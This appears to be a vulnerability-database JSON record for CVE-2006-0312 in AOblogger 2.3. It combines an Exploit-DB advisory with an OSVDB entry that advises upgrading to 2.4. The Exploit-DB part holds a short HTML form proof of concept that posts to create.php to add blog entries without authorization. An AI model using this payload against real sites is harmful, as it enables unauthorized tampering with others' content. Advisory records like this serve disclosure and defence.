{"exploitdb": [{"lastseen": "2016-02-03T05:07:22", "bulletinFamily": "exploit", "description": "aoblogger 2.3 create.php Unauthenticated Entry Creation. CVE-2006-0312. Webapps exploit for php platform", "modified": "2006-01-17T00:00:00", "published": "2006-01-17T00:00:00", "id": "EDB-ID:27106", "href": "https://www.exploit-db.com/exploits/27106/", "type": "exploitdb", "title": "aoblogger 2.3 create.php Unauthenticated Entry Creation", "sourceData": "source: http://www.securityfocus.com/bid/16286/info\r\n \r\nAOblogger is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.\r\n \r\nSuccessful exploitation of these vulnerabilities could allow an attacker to:\r\n \r\n- compromise the application\r\n- access, modify, or create data\r\n- steal cookie-based authentication credentials.\r\n \r\nAn attacker may also be able to exploit vulnerabilities in the underlying database implementation and to launch other attacks.\r\n \r\nVersion 2.3 is vulnerable; other versions may also be affected. \r\n\r\nAn example of new entry creation without proper authorization has been provided:\r\n\r\n<form action=\"http://www.example.com/aoblogger/create.php\" method=\"post\">\r\n<input name=\"uza\" value=1>\r\n<input name=\"title\" value=\"anytitle\">\r\n<textarea name=\"message\">anymessage</textarea>\r\n</form> ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/27106/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:19", "bulletinFamily": "software", "description": "## Solution Description\nUpgrade to version 2.4 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## References:\nVendor URL: http://mikeheltonisawesome.com/\n[Secunia Advisory ID:16889](https://secuniaresearch.flexerasoftware.com/advisories/16889/)\n[Related OSVDB ID: 22526](https://vulners.com/osvdb/OSVDB:22526)\n[Related OSVDB ID: 22527](https://vulners.com/osvdb/OSVDB:22527)\nOther Advisory URL: http://evuln.com/vulns/37/summary.html\nMail List Post: http://attrition.org/pipermail/vim/2006-April/000700.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-01/0322.html\nKeyword: EV0037\nFrSIRT Advisory: ADV-2006-0240\n[CVE-2006-0312](https://vulners.com/cve/CVE-2006-0312)\nBugtraq ID: 16286\n", "modified": "2006-01-16T04:18:26", "published": "2006-01-16T04:18:26", "href": "https://vulners.com/osvdb/OSVDB:22528", "id": "OSVDB:22528", "type": "osvdb", "title": "aoblogger create.php Unauthenticated Entry Creation", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}]}